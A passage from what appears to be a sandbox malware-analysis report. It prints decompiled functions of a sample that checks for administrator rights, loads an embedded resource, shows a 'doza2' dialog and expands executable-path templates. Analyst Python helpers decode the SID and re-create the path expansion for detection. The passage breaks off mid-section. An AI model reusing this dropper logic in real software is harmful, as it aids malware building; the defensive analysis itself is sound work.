					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24); // 0 = LMEM_FIXED, _v24 = required TokenGroups size
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) { // 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS: builds S-1-5-32-544, BUILTIN\Administrators
						L15:
						LocalFree(_t52);
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x198128 = 1;
                                                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001918DD), ref: 0019181A
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0019182C
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: AllocateAndInitializeSid.ADVAPI32(001918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001918DD), ref: 00191855
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: FreeSid.ADVAPI32(?,?,?,?,001918DD), ref: 00191883
                                                                                                                                                                                                                                      • Part of subcall function 001917EE: FreeLibrary.KERNEL32(00000000,?,?,?,001918DD), ref: 0019188A
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001918EB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 001918F2
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0019190A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00191918
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0019192C
                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00191944
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00191964
                                                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0019197A
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0019199C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 001919A3
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001919AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
• String ID:
• API String ID: 2168512254-0
• Opcode ID: 27a27719d98046b0402c2f22860fad03b6788cc8ba144744d9bf561ce3021134
• Instruction ID: da93aa154604930595b666b2d88573e7d5245d9d78d0bcb2782196ce48c79a56
• Opcode Fuzzy Hash: 27a27719d98046b0402c2f22860fad03b6788cc8ba144744d9bf561ce3021134
• Instruction Fuzzy Hash: D7310971A0020AAFDF209FA5DC98ABFBBB8FF45744F54042AF545D2160DB319989CB62
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
E0019468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
	long _t4;
	void* _t11;
	CHAR* _t14;
	void* _t15;
	long _t16;

	_t14 = __ecx;
	_t11 = __edx;
	_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
	_t16 = _t4;
	if(_t16 <= _a4 && _t11 != 0) {
		if(_t16 == 0) {
			L5:
			return 0;
		}
		_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
		if(_t15 == 0) {
			goto L5;
		}
		__imp__memcpy_s(_t11, _a4, _t15, _t16);
		FreeResource(_t15);
		return _t16;
	}
	return _t4;
}

Statement addresses (one per decompiled statement, in order): 0x00194699, 0x0019469b, 0x001946a9, 0x001946af, 0x001946b4, 0x001946bc, 0x001946f9, 0x00000000, 0x001946f9, 0x001946d9, 0x001946dd, 0x00000000, 0x00000000, 0x001946e5, 0x001946ef, 0x00000000, 0x001946f5, 0x001946ff

APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
• SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
• LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
• LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
• memcpy_s.MSVCRT ref: 001946E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$doza2
• API String ID: 3370778649-4167907646
• Opcode ID: c8bb88cb93df4b773da6235b6bd3cd720b93d41d0791376bbe8b4041beb0a402
• Instruction ID: ac3ab935de6803287a9318d32a50a3762a801a95d2f9f38fce668db5d4321dbb
• Opcode Fuzzy Hash: c8bb88cb93df4b773da6235b6bd3cd720b93d41d0791376bbe8b4041beb0a402
• Instruction Fuzzy Hash: 1401F9722403007BE71017A55C0DF2B3E2CDFC6F51F480026FB4987140CA71988582F2
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%
E001917EE(intOrPtr* __ecx) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	_Unknown_base(*)()* _v20;
	void* _v24;
	intOrPtr* _v28;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t14;
	_Unknown_base(*)()* _t20;
	long _t28;
	void* _t35;
	struct HINSTANCE__* _t36;
	signed int _t38;
	intOrPtr* _t39;

	_t14 =  *0x198004; // 0x21bd9a3c
	_v8 = _t14 ^ _t38;
	_v12 = 0x500;
	_t37 = __ecx;
	_v16.Value = 0;
	_v28 = __ecx;
	_t28 = 0;
	_t36 = LoadLibraryA("advapi32.dll");
	if(_t36 != 0) {
		_t20 = GetProcAddress(_t36, "CheckTokenMembership");
		_v20 = _t20;
		if(_t20 != 0) {
			 *_t37 = 0;
			_t28 = 1;
			if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
				_t37 = _t39;
				 *0x19a288(0, _v24, _v28);
				_v20();
				if(_t39 != _t39) {
					asm("int 0x29");
				}
				FreeSid(_v24);
			}
		}
		FreeLibrary(_t36);
	}
	return E00196CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
}

Statement addresses (one per decompiled statement, in order): 0x001917f6, 0x001917fd, 0x00191805, 0x0019180b, 0x0019180d, 0x00191815, 0x00191818, 0x00191820, 0x00191824, 0x0019182c, 0x00191832
                                                                                                                                                                                                                                    0x00191837
                                                                                                                                                                                                                                    0x00191851
                                                                                                                                                                                                                                    0x00191854
                                                                                                                                                                                                                                    0x0019185d
                                                                                                                                                                                                                                    0x00191862
                                                                                                                                                                                                                                    0x0019186c
                                                                                                                                                                                                                                    0x00191872
                                                                                                                                                                                                                                    0x00191877
                                                                                                                                                                                                                                    0x0019187e
                                                                                                                                                                                                                                    0x0019187e
                                                                                                                                                                                                                                    0x00191883
                                                                                                                                                                                                                                    0x00191883
                                                                                                                                                                                                                                    0x0019185d
                                                                                                                                                                                                                                    0x0019188a
                                                                                                                                                                                                                                    0x0019188a
                                                                                                                                                                                                                                    0x001918a2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001918DD), ref: 0019181A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0019182C
                                                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(001918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001918DD), ref: 00191855
                                                                                                                                                                                                                                    • FreeSid.ADVAPI32(?,?,?,?,001918DD), ref: 00191883
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,001918DD), ref: 0019188A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                    • Opcode ID: 585ea8dc62aee96a5024582ee09d75fe9c002046a39a98741a619cc455940f58
                                                                                                                                                                                                                                    • Instruction ID: 1cdb323afa44f6bb9b489f0199641d5630e262802713c7a0120e03e8270e8732
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 585ea8dc62aee96a5024582ee09d75fe9c002046a39a98741a619cc455940f58
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8119331E00209BBDB109FA4EC49ABEBB78EF44700F54056AFA11E2290DB309D448BD2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%
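The helper above resolves CheckTokenMembership at run time (LoadLibraryA("advapi32.dll") followed by GetProcAddress, so the name never appears in the static import table) and builds the SID it tests against with AllocateAndInitializeSid(001918DD, 2, 0x20, 0x220, ...). Decoding those arguments is the quickest way to confirm which group the sample is checking. The following Python is an added example, not code from this report or from the sample: it lays out a binary SID the way AllocateAndInitializeSid does, renders it as an S-1-... string, and maps it to a well-known alias. The identifier authority is passed by pointer (001918DD) and its bytes are not shown in the listing, so using SECURITY_NT_AUTHORITY (S-1-5) is an assumption, as are the constructed REPORTED_CALL tuple and the small WELL_KNOWN table.

```python
import struct

# Constructed from the APIs entry in the report:
#   AllocateAndInitializeSid(001918DD, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, &sid)
# The identifier authority is only visible as a pointer (001918DD); the value
# below is an ASSUMPTION (SECURITY_NT_AUTHORITY = S-1-5), not read from the dump.
SECURITY_NT_AUTHORITY = bytes([0, 0, 0, 0, 0, 5])
REPORTED_CALL = (2, (0x20, 0x220, 0, 0, 0, 0, 0, 0))  # nSubAuthorityCount, dwSubAuthority0..7

# Small, hand-built table of aliases an analyst meets in this kind of check.
WELL_KNOWN = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}


def build_sid(identifier_authority: bytes, sub_authorities) -> bytes:
    """Lay out a binary SID as AllocateAndInitializeSid does:
    Revision (1) | SubAuthorityCount | 6-byte big-endian IdentifierAuthority |
    SubAuthorityCount little-endian DWORD RIDs."""
    if len(identifier_authority) != 6:
        raise ValueError("identifier authority must be 6 bytes")
    count = len(sub_authorities)
    if not 1 <= count <= 15:  # SID_MAX_SUB_AUTHORITIES is 15
        raise ValueError("sub-authority count out of range")
    return bytes([1, count]) + identifier_authority + struct.pack("<%dI" % count, *sub_authorities)


def sid_to_string(sid: bytes) -> str:
    """Render a binary SID as S-R-I-S...; rejects truncated or unknown-revision data."""
    if len(sid) < 8 or sid[0] != 1:
        raise ValueError("not a revision-1 SID")
    count = sid[1]
    if count > 15 or len(sid) != 8 + 4 * count:
        raise ValueError("sub-authority count does not match buffer length")
    authority = int.from_bytes(sid[2:8], "big")
    # Windows prints identifier authorities that do not fit in 32 bits as hex.
    auth_text = str(authority) if authority < 2 ** 32 else "0x%012X" % authority
    rids = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-1-%s" % auth_text + "".join("-%d" % r for r in rids)


def decode_allocate_call(sub_count, rids, identifier_authority=SECURITY_NT_AUTHORITY):
    """Interpret AllocateAndInitializeSid arguments as logged by a sandbox:
    only the first sub_count of the eight dwSubAuthorityN slots are meaningful."""
    if not 1 <= sub_count <= 8:
        raise ValueError("AllocateAndInitializeSid accepts 1..8 sub-authorities")
    sid = build_sid(identifier_authority, list(rids)[:sub_count])
    text = sid_to_string(sid)
    return text, WELL_KNOWN.get(text, "(not a well-known alias)")


if __name__ == "__main__":
    sid_text, alias = decode_allocate_call(*REPORTED_CALL)
    print(sid_text, alias)  # S-1-5-32-544 BUILTIN\Administrators
```

Under that assumption the arguments decode to S-1-5-32-544, BUILTIN\Administrators, so the CheckTokenMembership call that follows is the standard "is my token a member of the local Administrators group" test. For hunting purposes, the useful observation from the listing is the dynamic resolution: a string search for "CheckTokenMembership" next to "advapi32.dll" in the unpacked image finds the check even though the import table does not list it.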

C-Code - Quality: 100%
			/* Dialog procedure (DLGPROC): _a4 = hwndDlg, _a8 = uMsg, _a12 = wParam.
			   Returns 1 when the message was handled, 0 otherwise. */
			E00193450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					/* WM_CLOSE (0x0010): close the dialog with result 2 (IDCANCEL) */
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					/* WM_INITDIALOG (0x0110): E001943D0 receives the dialog and the desktop
					   window (presumably to position the dialog on screen), the title is set
					   to "doza2", control 0x838 gets the text pointed to by the global at
					   0x199404, and the dialog is forced to the foreground. */
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E001943D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x199404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					/* WM_COMMAND (0x0111): _a12 carries the control / command identifier */
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						/* IDYES (6) or IDNO (7): close and return the button identifier */
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					/* control 0x839: raise the global flag at 0x1991dc, then close with 0x839 */
					 *0x1991dc = 1;
					goto L8;
				}
				return 0;
			}

Line addresses for the listing above, in order: 0x00193459, 0x0019345c, 0x001934d8, 0x001934de, 0x00000000, 0x001934e0, 0x0019345e, 0x00193463, 0x0019349a, 0x001934a0, 0x001934a7, 0x001934b2, 0x001934c4, 0x001934cb, 0x00000000, 0x001934cb, 0x00193468, 0x0019346e, 0x00193474, 0x00000000, 0x00000000, 0x0019347c, 0x0019348c, 0x00193490, 0x00000000, 0x00193496, 0x00193484, 0x00000000, 0x00000000, 0x00193486, 0x00000000, 0x00193486, 0x00000000

APIs
• EndDialog.USER32(?,?), ref: 00193490
• GetDesktopWindow.USER32 ref: 0019349A
• SetWindowTextA.USER32(?,doza2), ref: 001934B2
• SetDlgItemTextA.USER32(?,00000838), ref: 001934C4
• SetForegroundWindow.USER32(?), ref: 001934CB
• EndDialog.USER32(?,00000002), ref: 001934D8
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Window$DialogText$DesktopForegroundItem
• String ID: doza2
• API String ID: 852535152-612509477
• Opcode ID: ca653d323f4063e6b52b35af642610183bd1610655a264371e4291342064de9b
• Instruction ID: d2c3b97f32094351612568a3e65897d5cd9368fa8561898fb684ddf250450d73
• Opcode Fuzzy Hash: ca653d323f4063e6b52b35af642610183bd1610655a264371e4291342064de9b
• Instruction Fuzzy Hash: C501B131244114ABCF2A5F68DC0C96D3A64FF09710F524036FA66879A0CB31AF82DBD6
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
/* E00192AAC: expands a template string (__ecx) into the output buffer (_a4),
 * resolving '#'-escapes against the path of the running module:
 *   "#D" -> directory of the executable (one trailing backslash removed)
 *   "#E" -> full path of the executable
 *   "##" -> a literal '#'
 * Any other "#x" sequence is dropped together with its '#'. __edx is passed
 * through to E001917C8, which appears to compute the space left in the output
 * buffer for the bounded copy E00191680; neither helper is shown here. */
E00192AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
    signed int _v8;
    char _v268;                 /* MAX_PATH buffer filled by GetModuleFileNameA */
    void* __ebx;
    void* __edi;
    void* __esi;
    CHAR* _t12;
    CHAR* _t14;
    signed int _t16;
    signed int _t17;            /* eax: stack cookie, later the current source byte */
    int _t21;
    char _t32;
    intOrPtr _t34;
    char* _t38;
    char _t42;
    char* _t44;
    CHAR* _t52;
    intOrPtr* _t55;
    CHAR* _t59;
    CHAR* _t60;
    void* _t62;
    CHAR* _t64;
    CHAR* _t65;
    signed int _t66;

    _t60 = __edx;
    _t16 =  *0x198004; // 0x21bd9a3c  (__security_cookie)
    _t17 = _t16 ^ _t66;
    _v8 = _t16 ^ _t66;          /* stack canary, checked on return */
    _t65 = _a4;                 /* destination write cursor */
    _t44 = __edx;
    _t64 = __ecx;               /* source read cursor */
    if( *((char*)(__ecx)) != 0) {
        /* *0x199a3c holds the module handle; _v268 receives the full exe path */
        GetModuleFileNameA( *0x199a3c,  &_v268, 0x104);
        while(1) {
            _t17 =  *_t64;
            if(_t17 == 0) {
                break;
            }
            /* copy the current character (both bytes if it is a DBCS lead byte) */
            _t21 = IsDBCSLeadByte(_t17);
             *_t65 =  *_t64;
            if(_t21 != 0) {
                _t65[1] = _t64[1];
            }
            if( *_t64 != 0x23) {                        /* not '#': keep the byte */
                L19:
                _t65 = CharNextA(_t65);
            } else {
                _t64 = CharNextA(_t64);                 /* skip the '#' */
                /* CharUpperA receives the single byte in its pointer argument */
                if(CharUpperA( *_t64) != 0x44) {        /* 'D' */
                    if(CharUpperA( *_t64) != 0x45) {    /* 'E' */
                        if( *_t64 == 0x23) {            /* "##": keep the '#' already written */
                            goto L19;
                        }
                        /* unknown escape: nothing is advanced, so the '#' is overwritten */
                    } else {
                        /* "#E": copy the full module path over the '#' */
                        E00191680(_t65, E001917C8(_t44, _t65),  &_v268);
                        _t52 = _t65;
                        _t14 =  &(_t52[1]); // 0x2
                        _t60 = _t14;
                        do {                            /* inlined strlen(_t65) */
                            _t32 =  *_t52;
                            _t52 =  &(_t52[1]);
                        } while (_t32 != 0);
                        goto L17;
                    }
                } else {
                    /* "#D": E001965E8 presumably strips the file name (not shown here) */
                    E001965E8( &_v268);
                    _t55 =  &_v268;
                    _t62 = _t55 + 1;
                    do {                                /* inlined strlen(_v268) */
                        _t34 =  *_t55;
                        _t55 = _t55 + 1;
                    } while (_t34 != 0);
                    /* drop a single trailing backslash */
                    _t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                    if(_t38 != 0 &&  *_t38 == 0x5c) {
                         *_t38 = 0;
                    }
                    E00191680(_t65, E001917C8(_t44, _t65),  &_v268);
                    _t59 = _t65;
                    _t12 =  &(_t59[1]); // 0x2
                    _t60 = _t12;
                    do {                                /* inlined strlen(_t65) */
                        _t42 =  *_t59;
                        _t59 =  &(_t59[1]);
                    } while (_t42 != 0);
                    L17:
                    /* advance past the copied path; on the "#D" path the register
                     * the decompiler names _t52 holds the value of _t59 */
                    _t65 =  &(_t65[_t52 - _t60]);
                }
            }
            _t64 = CharNextA(_t64);
        }
         *_t65 = _t17;                                  /* _t17 == 0 here: terminate the output */
    }
    return E00196CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);   /* __security_check_cookie */
}
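The expansion loop above is easiest to reason about as a small re-implementation. The following Python is an added analysis helper, not code from the sample or from the Joe Sandbox report; it reproduces the behaviour recovered from the E00192AAC listing so that template strings found in the sample's memory can be expanded against a chosen module path. Two points are assumptions rather than facts shown in the listing: that E001965E8 strips the file-name component (so "#D" yields the executable's directory) and that E00191680 is a plain bounded copy. DBCS lead-byte handling is absorbed by Python's Unicode strings, and the module path and templates are constructed test data.

```python
"""Re-implementation of the '#'-placeholder expansion in E00192AAC.

Behaviour recovered from the decompiled loop:
  "#D" -> directory of the running executable (one trailing '\\' removed)
  "#E" -> full path of the running executable
  "##" -> a literal '#'
  "#x" -> any other escape is dropped together with its '#'
  "#"  -> a '#' at the very end of the template is dropped

Assumptions (not proven by the listing): E001965E8 behaves like
PathRemoveFileSpec, and E00191680 is a bounded string copy. The paths
and templates used below are constructed for illustration.
"""


def _module_dir(module_path: str) -> str:
    """Mirror the '#D' branch: strip the file name, then one trailing backslash."""
    # assumed PathRemoveFileSpec-like helper: keep everything up to the last '\'
    directory = module_path[: module_path.rfind("\\") + 1]
    # the listing then uses CharPrevA to look at the last byte and zeroes it if it is '\'
    if directory.endswith("\\"):
        directory = directory[:-1]
    return directory


def expand_template(template: str, module_path: str) -> str:
    """Expand a template the way E00192AAC does for the running module."""
    out = []
    i = 0
    while i < len(template):
        ch = template[i]
        if ch != "#":                # plain byte: copied and the cursor advanced
            out.append(ch)
            i += 1
            continue
        i += 1                       # skip the '#', like CharNextA(src)
        if i >= len(template):
            break                    # dangling '#': the loop exits and the NUL overwrites it
        esc = template[i]
        if esc.upper() == "D":       # CharUpperA(*src) == 'D'
            out.append(_module_dir(module_path))
        elif esc.upper() == "E":     # CharUpperA(*src) == 'E'
            out.append(module_path)
        elif esc == "#":             # "##" keeps the '#' that was already copied
            out.append("#")
        # any other escape: nothing is written, the '#' is overwritten later
        i += 1                       # CharNextA(src) at the end of the loop body
    return "".join(out)


# constructed example values; not taken from the sandbox report
EXAMPLE_MODULE = "C:\\Users\\analyst\\Desktop\\dropper.exe"
EXAMPLE_TEMPLATES = [
    '"#E" /silent',
    "#D\\payload.exe",
    "100## complete",
    "keep#Zthis",
]

if __name__ == "__main__":
    for t in EXAMPLE_TEMPLATES:
        print(f"{t!r:24} -> {expand_template(t, EXAMPLE_MODULE)!r}")
```

Running it against strings pulled from the process dump shows what command lines or drop paths the stub would actually build on the victim machine, which is usually more useful for detection than the raw template.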

(Address column for the E00192AAC listing above, starting at 0x00192aac; the extraction separated the per-line instruction addresses from the code they belong to.)
                                                                                                                                                                                                                                    0x00192b05
                                                                                                                                                                                                                                    0x00192b0b
                                                                                                                                                                                                                                    0x00192bca
                                                                                                                                                                                                                                    0x00192bd1
                                                                                                                                                                                                                                    0x00192b11
                                                                                                                                                                                                                                    0x00192b18
                                                                                                                                                                                                                                    0x00192b26
                                                                                                                                                                                                                                    0x00192b99
                                                                                                                                                                                                                                    0x00192bc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192b9b
                                                                                                                                                                                                                                    0x00192bae
                                                                                                                                                                                                                                    0x00192bb3
                                                                                                                                                                                                                                    0x00192bb5
                                                                                                                                                                                                                                    0x00192bb5
                                                                                                                                                                                                                                    0x00192bb8
                                                                                                                                                                                                                                    0x00192bb8
                                                                                                                                                                                                                                    0x00192bba
                                                                                                                                                                                                                                    0x00192bbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192bb8
                                                                                                                                                                                                                                    0x00192b28
                                                                                                                                                                                                                                    0x00192b2e
                                                                                                                                                                                                                                    0x00192b33
                                                                                                                                                                                                                                    0x00192b39
                                                                                                                                                                                                                                    0x00192b3c
                                                                                                                                                                                                                                    0x00192b3c
                                                                                                                                                                                                                                    0x00192b3e
                                                                                                                                                                                                                                    0x00192b3f
                                                                                                                                                                                                                                    0x00192b55
                                                                                                                                                                                                                                    0x00192b5d
                                                                                                                                                                                                                                    0x00192b64
                                                                                                                                                                                                                                    0x00192b64
                                                                                                                                                                                                                                    0x00192b7a
                                                                                                                                                                                                                                    0x00192b7f
                                                                                                                                                                                                                                    0x00192b81
                                                                                                                                                                                                                                    0x00192b81
                                                                                                                                                                                                                                    0x00192b84
                                                                                                                                                                                                                                    0x00192b84
                                                                                                                                                                                                                                    0x00192b86
                                                                                                                                                                                                                                    0x00192b87
                                                                                                                                                                                                                                    0x00192bbf
                                                                                                                                                                                                                                    0x00192bc1
                                                                                                                                                                                                                                    0x00192bc1
                                                                                                                                                                                                                                    0x00192b26
                                                                                                                                                                                                                                    0x00192bda
                                                                                                                                                                                                                                    0x00192bda
                                                                                                                                                                                                                                    0x00192be6
                                                                                                                                                                                                                                    0x00192be6
                                                                                                                                                                                                                                    0x00192bf8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00192AE6
                                                                                                                                                                                                                                    • IsDBCSLeadByte.KERNEL32(00000000), ref: 00192AF2
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00192B12
                                                                                                                                                                                                                                    • CharUpperA.USER32 ref: 00192B1E
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,?), ref: 00192B55
                                                                                                                                                                                                                                    • CharNextA.USER32(?), ref: 00192BD4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
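The five dump names above encode the in-memory layout of the module at 0x190000: header at 0x190000 (protection 0x02), code at 0x191000 (0x20), data at 0x198000 (0x04), two further read-only regions at 0x19A000 and 0x19C000. The following parser is an added example, not part of the Joe Sandbox report or its tooling. The dotted-field layout of an .sdmp name is not documented on this page, so the field roles (process index, stage, dump id, base, protection, type, two unexplained trailing fields) are an assumption; the protection field is read as the standard Windows PAGE_* constants, which is consistent with every region listed. The W+X check goes beyond the page: none of these regions is writable and executable, but a dumped region that is would be the first place to look when a sample unpacks itself in place.

```python
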